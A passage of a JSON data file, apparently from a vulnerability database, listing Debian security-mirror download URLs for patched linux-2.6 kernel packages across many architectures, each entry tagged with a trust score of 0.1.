        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-26etch2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-26etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-26etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-26etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-26etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-26etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-26etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-26etch2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-26etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-26etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-26etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-26etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-26etch2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-26etch2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-26etch2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-26etch2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-26etch2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-26etch2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-26etch2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-26etch2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
